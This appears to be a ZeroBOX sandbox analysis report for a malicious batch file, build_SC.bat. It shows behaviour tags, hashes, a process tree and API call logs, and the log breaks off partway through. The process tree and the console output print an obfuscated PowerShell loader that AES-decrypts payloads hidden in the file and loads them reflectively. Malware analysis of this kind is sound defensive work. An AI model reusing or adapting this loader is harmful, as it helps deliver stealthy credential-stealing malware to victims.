popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

build_SC.bat

Downloader FTP Code injection DGA HTTP PWS ScreenShot Create Service KeyLogger P2P Internet API Sniff Audio DNS Escalate priviledges Http API Anti_VM Steal credential Socket AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 June 21, 2023, 7:45 a.m. June 21, 2023, 7:48 a.m.
Size 3.9MB
Type DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5 6cfcd7cf6081cb3dddc3b942446d9e43
SHA256 5259f147e8dee58a3e88aa1edf3521ab687bb28d52c1087c97b8a979d9d3c2c8
CRC32 9D63D660
ssdeep 49152:mA7srW+3kru5lgZDFlrcmLVEXKTiYz3M/QtuYKv+utgy0gh0HVTl8:y
Yara
  • anti_vm_detect - Possibly employs anti-virtualization techniques

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "EWhuIXEf" C:\Users\test22\AppData\Local\Temp\build_SC.bat

    3016

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

      964

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\build_SC.bat

        2252

        • build_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\build_SC.bat.exe" -w hidden -c $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj', '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutxljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljExttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttxlj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj', '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj', '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='RetxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Replace('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.Aes]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.Convert]::$qaJF('ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=[System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKlx=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwbHF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vwbHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAmP=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uMOp([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZAmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));$aLVEO=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::$poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);

          2412

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: At line:1 char:962
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + $VWrg='Sptxljlitxljttxlj'.Replace('txlj', '');$poxH='Loadtxlj'.Replace('txlj'
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: , '');$PSUs='EntrtxljyPtxljointxljttxlj'.Replace('txlj', '');$JWKh='GettxljCutx
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ljrretxljntPtxljrtxljocetxljsstxlj'.Replace('txlj', '');$uMOp='ChtxljangetxljEx
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: ttxljenstxljiotxljntxlj'.Replace('txlj', '');$ngbA='EletxljmtxljenttxljAtxljttx
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: lj'.Replace('txlj', '');$Idpk='MaitxljnMtxljotxljdutxljletxlj'.Replace('txlj',
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: '');$HZsE='TrtxljantxljsftxljormtxljFitxljnaltxljBlotxljcktxlj'.Replace('txlj',
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: '');$qaJF='FromtxljBtxljatxljsetxlj64txljStxljtrintxljgtxlj'.Replace('txlj', '
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ');$WYHj='CtxljreatxljteDtxljecrtxljyptotxljrtxlj'.Replace('txlj', '');$Yxzl='R
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: etxljadtxljLinetxljstxlj'.Replace('txlj', '');$XZtr='Intxljvotxljktxljetxlj'.Re
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: place('txlj', '');function JeoHt($ELZLV){$PsSBT=[System.Security.Cryptography.A
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: es]::Create();$PsSBT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsSBT
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: .Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsSBT.Key=[System.C
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: onvert]::$qaJF( <<<< 'ysmJpAaiNCwHWX8owtLbwDXbvqF4qqJv/N6iULJxQX4=');$PsSBT.IV=
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: [System.Convert]::$qaJF('KkVvrh415rYbWSxbwOYxSw==');$vXLcw=$PsSBT.$WYHj();$XqKl
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: x=$vXLcw.$HZsE($ELZLV,0,$ELZLV.Length);$vXLcw.Dispose();$PsSBT.Dispose();$XqKlx
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: ;}function vIJeV($ELZLV){$fXyGt=New-Object System.IO.MemoryStream(,$ELZLV);$vwb
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: HF=New-Object System.IO.MemoryStream;$QVgMh=New-Object System.IO.Compression.GZ
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: ipStream($fXyGt,[IO.Compression.CompressionMode]::Decompress);$QVgMh.CopyTo($vw
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: bHF);$QVgMh.Dispose();$fXyGt.Dispose();$vwbHF.Dispose();$vwbHF.ToArray();}$BZAm
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: P=[System.Linq.Enumerable]::$ngbA([System.IO.File]::$Yxzl([System.IO.Path]::$uM
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: Op([System.Diagnostics.Process]::$JWKh().$Idpk.FileName, $null)), 1);$hOQTZ=$BZ
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: AmP.Substring(2).$VWrg(':');$OGRUZ=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[0])));
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: $aLVEO=vIJeV (JeoHt ([Convert]::$qaJF($hOQTZ[1])));[System.Reflection.Assembly]
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: ::$poxH([byte[]]$aLVEO).$PSUs.$XZtr($null,$null);[System.Reflection.Assembly]::
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: $poxH([byte[]]$OGRUZ).$PSUs.$XZtr($null,$null);
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: ecordException
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : UnexpectedToken
console_handle: 0x0000017f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00398270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00398270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00398270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003978f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00398070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00398070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00398070
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003979f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003974f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00397bb0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003982f0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 1441792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02690000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2412
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73aa1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0225a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2412
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73aa2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02252000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02262000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0228a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02263000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02264000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0229b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02297000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0225b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02282000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02295000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02265000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0228c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02266000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0229c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02283000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02284000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02285000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02286000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02287000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02288000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02289000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f25000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f26000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f27000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f28000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f29000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f2f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2412
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f31000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

